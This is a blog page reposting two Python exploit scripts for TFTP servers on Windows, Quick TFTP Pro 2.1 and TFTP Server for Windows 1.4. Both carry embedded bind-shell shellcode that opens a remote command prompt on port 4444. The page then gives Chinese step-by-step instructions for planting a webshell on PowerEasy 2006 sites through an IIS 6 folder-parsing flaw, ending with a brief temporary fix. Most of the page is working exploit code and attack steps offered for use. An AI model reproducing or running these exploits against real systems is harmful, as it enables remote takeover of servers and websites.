飘零的代码 piao2010 ’s blog

#!/usr/bin/python# Quick TFTP Pro 2.1 SEH Overflow (0day)# Tested on Windows XP SP2. # Coded by Mati Aharoni# muts..at..offensive-security.com# http://www.offensive-security.com/0day/quick-tftp-poc.py.txt########################################################## bt ~ # quickftp.py# [*] Quick TFTP Pro 2.1 SEH Overflow (0day)# [*] http://www.offensive-security.com# [*] Sending evil packet, ph33r# [*] Check port 4444 for bindshell# bt ~ # nc -v 172.16.167.130 4444# (UNKNOWN) [172.16.167.130] 4444 (krb524) open# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:\\Documents and Settings\\Administrator>##########################################################import socketimport sysprint "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"print "[*] http://www.offensive-security.com"host = '172.16.167.134'port = 69try:   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:   print "socket() failed"   sys.exit(1)filename = "pwnd"# windows/shell_bind_tcp - 317 bytes# http://www.metasploit.com# EXITFUNC=thread, LPORT=4444shell=("\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b""\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01""\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07""\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f""\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b""\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c""\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff""\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0""\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08""\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53""\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66""\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51""\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0""\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93""\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66""\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89""\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38""\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57""\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9""\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83""\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6""\\xff\\xd0")mode = "A"*1019+"\\xeb\\x08\\x90\\x90"+"\\x58\\x14\\xd3\\x74"+"\\x90"*16+shellmuha = "\\x00\\x02" + filename+ "\\0" + mode + "\\0" print "[*] Sending evil packet, ph33r"s.sendto(muha, (host, port))print "[*] Check port 4444 for bindshell"# milw0rm.com [2008-03-26]

#!/usr/bin/python# TFTP Server for Windows V1.4 ST (0day)# http://sourceforge.net/projects/tftp-server/# Tested on Windows Vista SP0.# Coded by Mati Aharoni# muts..at..offensive-security.com# http://www.offensive-security.com/0day/sourceforge-tftpd.py.txt################################################################### bt ~ # sourceforge-tftpd.py# [*] TFTP Server for Windows V1.4 ST (0day)# [*] http://www.offensive-security.com# [*] Sending evil packet, ph33r# [*] Check port 4444 for bindshell# bt ~ # nc -v 172.16.167.134 4444# (UNKNOWN) [172.16.167.134] 4444 (krb524) open# Microsoft Windows [Version 6.0.6000]# Copyright (c) 2006 Microsoft Corporation.  All # rights reserved.## C:\\Windows\\system32>##################################################################import socketimport sysprint "[*] TFTP Server for Windows V1.4 ST (0day)"print "[*] http://www.offensive-security.com"host = '172.16.167.134'port = 69try:   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:   print "socket() failed"   sys.exit(1)# Jump back shellcodesc = "\\x6a\\x05\\x59\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x16\\x91\\x9c"sc +="\\x30\\x83\\xeb\\xfc\\xe2\\xf4\\xcf\\x7f\\x45\\x44\\x32\\x65\\xc5\\xb0\\xd7\\x9b"sc +="\\x0c\\xce\\xdb\\x6f\\x51\\xcf\\xf7\\x91\\x9c\\x30"# windows/shell_bind_tcp - 317 bytes# http://www.metasploit.com# EXITFUNC=seh, LPORT=4444shell=("\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b""\\x45\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01""\\xeb\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07""\\xc1\\xca\\x0d\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f""\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b""\\x89\\x6c\\x24\\x1c\\x61\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c""\\x8b\\x70\\x1c\\xad\\x8b\\x40\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff""\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0""\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08""\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\\xf5\\xad\\x57\\xff\\xd6\\x53""\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x66\\x68\\x11\\x5c\\x66""\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\\xd6\\x6a\\x10\\x51""\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\\x55\\xff\\xd0""\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\\xd0\\x93""\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66""\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89""\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38""\\xab\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57""\\x52\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9""\\x05\\xce\\x53\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83""\\xc4\\x64\\xff\\xd6\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6""\\xff\\xd0")filename = "\\x90"*860 + shell + "\\x90"*14 + sc + "\\xeb\\xd0\\x90\\x90" + "\\x2b\\x0e\\x41"mode = "netascii"muha = "\\x00\\x02" + filename+ "\\0" + mode+ "\\0" print "[*] Sending evil packet, ph33r"s.sendto(muha, (host, port))print "[*] Check port 4444 for bindshell"# milw0rm.com [2008-03-26]

1.目标操作系统是2003服务器版
2.目标动易系统可注册可上传
3.注册帐号一定要注册成XXX.asp的形式
4.然后利用上传代码来上传图片木马
/user/Upload.asp?dialogtype=UserBlogPic&size=5
5.得到webshell

危害程度：极严重。黑客可以通过此漏洞取得WebShell权限。

影响版本：动易2006 所有版本（包括免费版、商业SQL版及Access版），正式版、SP1、SP2、SP3、SP4、SP5都受此影响。

漏洞描述：因为Win2003存在着一个文件解析路径的漏洞，当文件夹名为类似hack.asp的时候（即文件夹名看起来像一个ASP文件的文件名），此时此文件夹下的文本类型的文件都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件，通过访问这个文件即可运行木马。因为微软尚未发布这个漏洞的补丁，所以几乎所有网站都会存在这个漏洞。

临时解决方法：删除Space文件夹（临时），删除User/User_Space.asp文件。